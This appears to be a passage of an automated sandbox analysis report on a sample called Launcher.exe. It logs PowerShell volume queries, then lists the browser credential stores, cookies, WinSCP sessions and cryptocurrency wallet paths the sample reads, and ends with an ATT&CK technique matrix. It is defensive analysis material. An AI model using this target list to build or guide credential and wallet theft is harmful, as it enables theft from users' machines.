        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Users\user\Desktop\Launcher.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite_tmp
        Source: C:\Users\user\Desktop\Launcher.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite_tmp

        Stealing of Sensitive Information

        Source: Yara match | File source: Process Memory Space: Launcher.exe PID: 5496, type: MEMORYSTR
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Electrum
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ElectronCash
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Electrum\wallets\
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty Wallet
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\window-state.json
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.conf.json
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: (insertion_info.second) == (true)
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\keystore\
        Source: Launcher.exe, 00000000.00000003.1316755134.000001752613D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: exodusDecrypt
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \ElectronCash\wallets\default_wallet
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Ethereum
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \MultiDog\multidoge.wallet\
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\seed.seco
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
        Source: C:\Windows\System32\reg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite_tmp-wal
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_tmp
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite_tmp-wal
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmp
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmp
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite_tmp
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite_tmp-shm
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite_tmp-shm
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies_tmp
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite_tmp
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies_tmp
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
        Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data_tmp
        Source: C:\Users\user\Desktop\Launcher.exe | Directory queried: C:\Users\user\Documents
        Source: C:\Users\user\Desktop\Launcher.exe | File opened / queried: C:\Users\user\AppData\Roaming\.minecraft
        Source: Yara match | File source: 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        Source: Yara match | File source: Process Memory Space: Launcher.exe PID: 5496, type: MEMORYSTR
        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
        |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
        | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 12 Registry Run Keys / Startup Folder | 11 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 12 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
        | Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 12 Registry Run Keys / Startup Folder | 1 Modify Registry | 1 Credentials in Registry | 2 Process Discovery | Remote Desktop Protocol | 1 Browser Session Hijacking | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
        | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 22 Data from Local System | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
        | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | Protocol Impersonation | Traffic Duplication | Data Destruction |
